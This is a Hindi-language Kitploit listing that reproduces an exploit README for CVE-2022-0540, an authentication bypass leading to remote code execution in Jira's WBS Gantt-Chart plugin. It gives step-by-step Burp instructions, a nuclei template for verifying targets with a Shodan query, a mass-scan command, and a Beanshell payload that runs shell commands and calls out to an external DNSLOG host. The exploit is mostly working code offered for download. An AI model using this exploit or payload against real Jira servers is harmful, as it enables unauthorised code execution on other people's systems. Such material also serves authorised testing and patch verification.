Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-0540-RCE — Atlassian Jira Seraph प्रमाणीकरण बाईपास RCE(CVE-2022-0540) | Kitploit
उपकरण/GitHubGitHub/pear1y/cve-2022-0540-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणपेलोड डेवलपमेंट
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Atlassian Jira Seraph प्रमाणीकरण बाईपास RCE(CVE-2022-0540)

रिपॉजिटरी देखें
711334 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Atlassian Jira Seraph प्रमाणीकरण बाईपास RCE(CVE-2022-0540)

अंग्रेज़ी • चीनी

शोषण विवरण

जैसा कि लेखक के ब्लॉग में देखा गया है, atlassian ने प्रभावित प्लगइन्स की एक लंबी सूची प्रदान की (जिनमें से अधिकांश गलत सकारात्मक थे), और लेखक ने कई वास्तविक प्रभावित प्लगइन्स सूचीबद्ध किए।

image-20220525190523282

संकेतित शर्तों के अनुसार, Jira के लिए WBS Gantt-Chart के आधिकारिक दस्तावेज़ के साथ संयुक्त

image-20220525190607569

मूलतः, यह जॉब शेड्यूलर मॉड्यूल टास्क के Beanshell स्क्रिप्ट का उपयोग करके एक RCE है, शोषण विवरण निम्नलिखित हैं।

  1. मैन्युअल संचालन के लिए BurpSuite के प्रतिस्थापन फ़ंक्शन Proxy > Options > Match and Replace का उपयोग करना बेहतर है, नियम संपादित करें।

image-20220525190640472

  1. burp को प्रॉक्सी के रूप में उपयोग करके कमजोर Jira सॉफ़्टवेयर तक पहुँचें,http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; खोलें, फिर आप जॉब शेड्यूलर कॉन्फ़िगरेशन देख सकते हैं।

image-20220525190657966

चूंकि हमारा अंतिम Beanshell स्क्रिप्ट एक समयबद्ध कार्य के रूप में निष्पादित होता है, आप अपनी सुविधा के लिए संपादन पर क्लिक करके और इसे क्रोन प्रारूप के अनुसार संशोधित करके निष्पादन अंतराल को संशोधित कर सकते हैं।

  1. कार्य बनाएँ

image-20220525190713512

  1. कार्य कॉन्फ़िगर करें

image-20220525190728145

कॉन्फ़िगरेशन पूरा होने के बाद, अपडेट पर क्लिक करें लेकिन लॉगिन पेज पर जाएँ, चिंता न करें, कार्य वास्तव में पृष्ठभूमि में जोड़ा गया है।

  1. कार्य सक्षम करें

image-20220525190740547

नवनिर्मित कार्य डिफ़ॉल्ट रूप से अक्षम है, आपको इसे मैन्युअल रूप से सक्षम में बदलना होगा और फिर स्क्रिप्ट के निष्पादन के लिए कुछ सेकंड प्रतीक्षा करनी होगी।

  1. DNSLOG रिकॉर्ड

image-20220525190756503

उसी समय, आप जॉब शेड्यूलर में निष्पादन पूर्ण होने का संकेत पा सकते हैं।

image-20220525190830668


पूर्व शर्तें

root@kitploit:~
WBS Gantt-Chart for Jira <= 9.14.3.1

शोषणीयता सत्यापित करें

root@kitploit:~
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

रन-डेमो

root@kitploit:~
nuclei -l targets.txt -t exploit.yaml

स्क्रीनशॉट

image-20220525173951955

संदर्भ

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Beanshell Script

root@kitploit:~
import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

इस लेख में उल्लिखित जानकारी केवल वैध, अधिकृत पेनिट्रेशन टेस्टिंग, आंतरिक कंपनी सुरक्षा जांच और शोध उपयोग के लिए है। उपयोगकर्ता इस लेख में दी गई जानकारी के उपयोग से उत्पन्न होने वाले किसी भी प्रतिकूल परिणाम के लिए जिम्मेदार है।

टूल डाउनलोड करें